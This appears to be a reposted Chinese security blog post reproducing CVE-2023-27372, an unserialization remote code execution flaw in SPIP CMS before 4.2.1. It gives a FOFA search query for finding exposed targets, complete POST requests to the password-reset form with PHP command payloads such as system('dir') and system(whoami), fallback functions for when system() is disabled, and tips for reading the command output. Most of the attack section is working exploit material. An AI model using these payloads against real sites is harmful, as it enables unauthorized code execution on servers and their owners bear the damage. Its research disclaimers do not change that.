SPIP-Cms <4.2.1_CVE-2023-27372_序列化RCE__手工复现__两步Attack(POC/EXP)

admin
admin
admin
139541
文章
114
评论
2023年7月3日09:24:21评论341 views字数 1834阅读6分6秒阅读模式

SPIP-Cms <4.2.1_CVE-2023-27372_序列化RCE__手工复现__两步Attack(POC/EXP)

勿要非法渗透,造成影响与本人无关

勿要非法渗透,造成影响与本人无关

漏洞描述:
SPIP Cms v4.2.1之前版本允许通过公共区域中的表单值远程执行代码,因为序列化处理不当。

漏洞分析:

漏洞存在与密码重置功能中(漏洞点位url:/spip.php?page=spip_pass),重置密码时 protege_champ()函数没有对序列化字符串进行过滤,从而触发命令执行漏洞。

影响版本:

SPIP < 4.2.1
FOFA语句:app="SPIP"

POC:

POST /spip.php?page=spip_pass HTTP/1.1Host: X.X.X.XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 187Connection: closeUpgrade-Insecure-Requests: 1

page=spip_pass&formulaire_action=oubli&formulaire_action_args=CSRF_TOKEN&oubli=s:19:"<?php phpinfo(); ?>";&nobot=

SPIP-Cms <4.2.1_CVE-2023-27372_序列化RCE__手工复现__两步Attack(POC/EXP)

手工复现/EXP:

1、访问漏洞点位/spip.php?page=spip_pass,抓包。

SPIP-Cms <4.2.1_CVE-2023-27372_序列化RCE__手工复现__两步Attack(POC/EXP)

2、写入Payload:

POST /spip.php?page=spip_pass HTTP/1.1Host: X.X.X.XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 191Connection: closeUpgrade-Insecure-Requests: 1
page=spip_pass&formulaire_action=oubli&formulaire_action_args=vddAKneot4atQD1TvjNXeWCZAXZ%2Fmc78KUVqDMXGTGIAWtu18expARKt23XzSiOlVsHk4KlNZ4iObZ4%3D&oubli=s:23:"<?php system('dir'); ?>";&nobot=

s:26:"<?php system(whoami); ?>";

Payload解释:s表示字符串格式,26表示Payload长度(冒号以内),如果禁用system(),可以使用shell_exec()、passthru()、proc_open()等等

命令执行成功后如下,只会显示前面部分(s:23:),后面命令部分转换成结果。如果整条命令回显表示不存在漏洞或 命令执行失败。

SPIP-Cms <4.2.1_CVE-2023-27372_序列化RCE__手工复现__两步Attack(POC/EXP)

SPIP-Cms <4.2.1_CVE-2023-27372_序列化RCE__手工复现__两步Attack(POC/EXP)

命令结果在"id='oubli'"

SPIP-Cms <4.2.1_CVE-2023-27372_序列化RCE__手工复现__两步Attack(POC/EXP)

SPIP-Cms <4.2.1_CVE-2023-27372_序列化RCE__手工复现__两步Attack(POC/EXP)

TIPS:

1、注意看清目标是什么系统,不一定只是Linux

2、命令执行失败:(1)看一下禁用函数。(2)更换命令执行函数。(3)字符原因。(4)系统环境问题。

3、响应包搜索id='oubli'就是命令执行的结果。

原文始发于微信公众号(YongYe 安全实验室):SPIP-Cms <4.2.1_CVE-2023-27372_序列化RCE__手工复现__两步Attack(POC/EXP)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年7月3日09:24:21
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   SPIP-Cms <4.2.1_CVE-2023-27372_序列化RCE__手工复现__两步Attack(POC/EXP)https://cn-sec.com/archives/1850567.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息